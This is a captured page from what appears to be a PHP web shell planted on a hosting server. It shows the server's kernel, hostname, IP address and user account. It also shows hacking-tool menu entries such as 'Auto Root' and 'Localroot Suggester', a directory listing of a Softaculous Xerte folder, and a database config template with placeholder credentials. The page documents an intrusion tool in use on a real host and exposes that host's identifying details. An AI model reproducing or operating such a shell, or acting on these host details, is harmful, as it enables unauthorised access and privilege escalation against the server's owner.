Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.216.17
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
xerte /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2017-02-14 20:36
php53
[ DIR ]
drwxr-xr-x
2017-02-14 20:36
php56
[ DIR ]
drwxr-xr-x
2017-02-14 20:36
database.php
654
B
-rwxr-xr-x
2016-10-03 00:13
fileindex.php
895
B
-rwxr-xr-x
2017-02-13 03:29
import.php
3.3
KB
-rwxr-xr-x
2017-02-13 05:04
info.xml
2.86
KB
-rwxr-xr-x
2017-02-13 03:29
install.js
924
B
-rwxr-xr-x
2016-10-03 00:13
install.php
4.23
KB
-rwxr-xr-x
2017-02-13 05:04
install.xml
963
B
-rwxr-xr-x
2016-10-03 00:13
md5
3.3
KB
-rwxr-xr-x
2017-02-13 05:04
notes.txt
172
B
-rwxr-xr-x
2017-02-13 03:29
Save
Rename
<?php /** * * database page, has the settings for database connection * * @author Patrick Lockley * @version 1.0 * @package */ /* * Database type */ $xerte_toolkits_site->database_type = "mysql"; /* * Host where database is */ $xerte_toolkits_site->database_host = "[[softdbhost]]"; /* * Username for database */ $xerte_toolkits_site->database_username ="[[softdbuser]]"; /* * Password for database */ $xerte_toolkits_site->database_password ="[[softdbpass]]"; /* * Database name */ $xerte_toolkits_site->database_name ="[[softdb]]"; /* * Database table prefix */ $xerte_toolkits_site->database_table_prefix ="[[dbprefix]]";